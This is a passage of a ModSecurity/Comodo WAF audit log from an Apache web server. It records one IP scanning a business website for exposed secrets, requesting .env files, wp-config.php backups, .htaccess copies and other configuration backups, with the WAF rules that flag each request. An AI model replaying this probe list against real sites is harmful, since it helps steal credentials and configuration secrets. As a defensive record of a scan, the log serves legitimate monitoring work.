+0530] aFBqrn8PxMRZ7s11niQJmQAAAAI 185.177.72.201 58850 127.0.0.1 7080 --ed5dc110-B-- GET /config.ini.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ed5dc110-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ed5dc110-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".ini.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.ini.bak"] [unique_id "aFBqrn8PxMRZ7s11niQJmQAAAAI"] Stopwatch: 1750100654745563 3126 (- - -) Stopwatch2: 1750100654745563 3126; combined=1740, p1=367, p2=1318, p3=0, p4=0, p5=55, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ed5dc110-Z-- --ee7ca55b-A-- [17/Jun/2025:00:34:15.190590 +0530] aFBqr5VkCcfT-Z8NQYyUkAAAAAc 185.177.72.201 58902 127.0.0.1 7080 --ee7ca55b-B-- GET /application/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --ee7ca55b-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --ee7ca55b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/application/.env"] [unique_id "aFBqr5VkCcfT-Z8NQYyUkAAAAAc"] Stopwatch: 1750100655187794 2849 (- - -) Stopwatch2: 1750100655187794 2849; combined=1627, p1=350, p2=1223, p3=0, p4=0, p5=53, sr=84, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --ee7ca55b-Z-- --efc2a57c-A-- [17/Jun/2025:00:34:15.302069 +0530] aFBqr1JfblPUQiSn5r1hUgAAAAA 185.177.72.201 58920 127.0.0.1 7080 --efc2a57c-B-- GET /config.inc.php.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --efc2a57c-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --efc2a57c-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".inc.php.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/config.inc.php.bak"] [unique_id "aFBqr1JfblPUQiSn5r1hUgAAAAA"] Stopwatch: 1750100655297914 4224 (- - -) Stopwatch2: 1750100655297914 4224; combined=2528, p1=500, p2=1951, p3=0, p4=0, p5=77, sr=163, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efc2a57c-Z-- --5bdd8e7f-A-- [17/Jun/2025:00:34:15.520312 +0530] aFBqr5VkCcfT-Z8NQYyUkQAAAAc 185.177.72.201 58960 127.0.0.1 7080 --5bdd8e7f-B-- GET /.htaccess.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5bdd8e7f-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --5bdd8e7f-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.backup"] [unique_id "aFBqr5VkCcfT-Z8NQYyUkQAAAAc"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.backup Stopwatch: 1750100655519594 770 (- - -) Stopwatch2: 1750100655519594 770; combined=349, p1=291, p2=0, p3=0, p4=0, p5=58, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5bdd8e7f-Z-- --271cca3d-A-- [17/Jun/2025:00:34:15.708242 +0530] aFBqrx6Azi2u_ik2Q3Ko1gAAAAY 185.177.72.201 58976 127.0.0.1 7080 --271cca3d-B-- GET /wp-config.php.6 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --271cca3d-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --271cca3d-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.6"] [unique_id "aFBqrx6Azi2u_ik2Q3Ko1gAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.6' not found or unable to stat Stopwatch: 1750100655627630 80676 (- - -) Stopwatch2: 1750100655627630 80676; combined=156947, p1=343, p2=1338, p3=0, p4=0, p5=77662, sr=82, sw=1, l=0, gc=77603 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --271cca3d-Z-- --93201601-A-- [17/Jun/2025:00:34:16.403188 +0530] aFBqsB6Azi2u_ik2Q3Ko2AAAAAY 185.177.72.201 59078 127.0.0.1 7080 --93201601-B-- GET /package.json.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --93201601-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --93201601-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".json.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/package.json.bak"] [unique_id "aFBqsB6Azi2u_ik2Q3Ko2AAAAAY"] Stopwatch: 1750100656399848 3414 (- - -) Stopwatch2: 1750100656399848 3414; combined=2008, p1=359, p2=1568, p3=0, p4=0, p5=81, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --93201601-Z-- --89b60552-A-- [17/Jun/2025:00:34:16.513569 +0530] aFBqsH8PxMRZ7s11niQJngAAAAI 185.177.72.201 59098 127.0.0.1 7080 --89b60552-B-- GET /web.config.save HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --89b60552-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --89b60552-H-- Message: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/web.config.save"] [unique_id "aFBqsH8PxMRZ7s11niQJngAAAAI"] Stopwatch: 1750100656510447 3193 (- - -) Stopwatch2: 1750100656510447 3193; combined=1944, p1=354, p2=1510, p3=0, p4=0, p5=80, sr=85, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --89b60552-Z-- --efa04231-A-- [17/Jun/2025:00:34:16.955464 +0530] aFBqsI3q6eGJ2xNcTd6GjgAAAAU 185.177.72.201 59136 127.0.0.1 7080 --efa04231-B-- GET /login.php.old HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --efa04231-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --efa04231-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/login.php.old"] [unique_id "aFBqsI3q6eGJ2xNcTd6GjgAAAAU"] Stopwatch: 1750100656952449 3067 (- - -) Stopwatch2: 1750100656952449 3067; combined=1729, p1=364, p2=1309, p3=0, p4=0, p5=56, sr=109, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --efa04231-Z-- --99c67261-A-- [17/Jun/2025:00:34:17.286587 +0530] aFBqsY3q6eGJ2xNcTd6GjwAAAAU 185.177.72.201 59186 127.0.0.1 7080 --99c67261-B-- GET /docs/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --99c67261-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --99c67261-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/docs/.env"] [unique_id "aFBqsY3q6eGJ2xNcTd6GjwAAAAU"] Stopwatch: 1750100657283548 3093 (- - -) Stopwatch2: 1750100657283548 3093; combined=1820, p1=347, p2=1419, p3=0, p4=0, p5=54, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --99c67261-Z-- --4baccc00-A-- [17/Jun/2025:00:34:17.394777 +0530] aFBqsSid3pHxA3RhGpzp8QAAAAk 185.177.72.201 59194 127.0.0.1 7080 --4baccc00-B-- GET /.htaccess.orig HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --4baccc00-F-- HTTP/1.1 403 Forbidden Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "31b-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 795 Connection: close Content-Type: text/html --4baccc00-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/.htaccess.orig"] [unique_id "aFBqsSid3pHxA3RhGpzp8QAAAAk"] Apache-Error: [file "mod_authz_core.c"] [line 879] [level 3] AH01630: client denied by server configuration: /var/www/vhosts/surbhiprintographics.com/httpdocs/.htaccess.orig Stopwatch: 1750100657393928 902 (- - -) Stopwatch2: 1750100657393928 902; combined=445, p1=382, p2=0, p3=0, p4=0, p5=63, sr=96, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4baccc00-Z-- --930da174-A-- [17/Jun/2025:00:34:17.504961 +0530] aFBqsX3hoSwVUy254pHz-gAAACQ 185.177.72.201 59212 127.0.0.1 7080 --930da174-B-- GET /demo/.env HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --930da174-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --930da174-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/demo/.env"] [unique_id "aFBqsX3hoSwVUy254pHz-gAAACQ"] Stopwatch: 1750100657502092 2922 (- - -) Stopwatch2: 1750100657502092 2922; combined=1739, p1=386, p2=1300, p3=0, p4=0, p5=53, sr=106, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --930da174-Z-- --87d1ec67-A-- [17/Jun/2025:00:34:17.616056 +0530] aFBqsR6Azi2u_ik2Q3Ko3AAAAAY 185.177.72.201 59216 127.0.0.1 7080 --87d1ec67-B-- GET /login.php.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --87d1ec67-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --87d1ec67-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".php.backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/login.php.backup"] [unique_id "aFBqsR6Azi2u_ik2Q3Ko3AAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/login.php.backup' not found or unable to stat Stopwatch: 1750100657612233 3900 (- - -) Stopwatch2: 1750100657612233 3900; combined=2293, p1=431, p2=1777, p3=0, p4=0, p5=85, sr=113, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --87d1ec67-Z-- --04347e26-A-- [17/Jun/2025:00:34:18.059268 +0530] aFBqsiid3pHxA3RhGpzp8wAAAAk 185.177.72.201 59272 127.0.0.1 7080 --04347e26-B-- GET /application.properties.bak HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --04347e26-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --04347e26-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||www.surbhiprintographics.com|F|2"] [data ".properties.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "www.surbhiprintographics.com"] [uri "/application.properties.bak"] [unique_id "aFBqsiid3pHxA3RhGpzp8wAAAAk"] Stopwatch: 1750100658055850 3486 (- - -) Stopwatch2: 1750100658055850 3486; combined=2071, p1=377, p2=1612, p3=0, p4=0, p5=81, sr=120, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --04347e26-Z-- --b5ec1c1f-A-- [17/Jun/2025:00:34:18.281280 +0530] aFBqsh6Azi2u_ik2Q3Ko3gAAAAY 185.177.72.201 59312 127.0.0.1 7080 --b5ec1c1f-B-- GET /wp-config.php.5 HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --b5ec1c1f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --b5ec1c1f-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/wp-config.php.5"] [unique_id "aFBqsh6Azi2u_ik2Q3Ko3gAAAAY"] Apache-Error: [file "./sapi/apache2handler/sapi_apache2.c"] [line 360] [level 3] script '/var/www/vhosts/surbhiprintographics.com/httpdocs/wp-config.php.5' not found or unable to stat Stopwatch: 1750100658277954 3382 (- - -) Stopwatch2: 1750100658277954 3382; combined=2021, p1=435, p2=1526, p3=0, p4=0, p5=60, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b5ec1c1f-Z-- --995c1c5f-A-- [17/Jun/2025:00:34:19.166156 +0530] aFBqsyid3pHxA3RhGpzp9gAAAAk 185.177.72.201 59398 127.0.0.1 7080 --995c1c5f-B-- GET /example.htaccess HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --995c1c5f-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 808 Connection: close Content-Type: text/html --995c1c5f-H-- Message: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase ".htaccess" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.surbhiprintographics.com"] [uri "/example.htaccess"] [unique_id "aFBqsyid3pHxA3RhGpzp9gAAAAk"] Stopwatch: 1750100659162794 3418 (- - -) Stopwatch2: 1750100659162794 3418; combined=2052, p1=383, p2=1609, p3=0, p4=0, p5=60, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --995c1c5f-Z-- --005e251a-A-- [17/Jun/2025:00:34:19.608997 +0530] aFBqs33hoSwVUy254pH0AAAAACQ 185.177.72.201 35490 127.0.0.1 7080 --005e251a-B-- GET /bak/.env.backup HTTP/1.0 Host: www.surbhiprintographics.com X-Real-IP: 185.177.72.201 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --005e251a-F-- HTTP/1.1 404 Not Found Last-Modified: Fri, 04 Oct 2024 13:48:31 GMT ETag: "328-623a6ed37c30b" Accept-Ranges: bytes Content-Length: 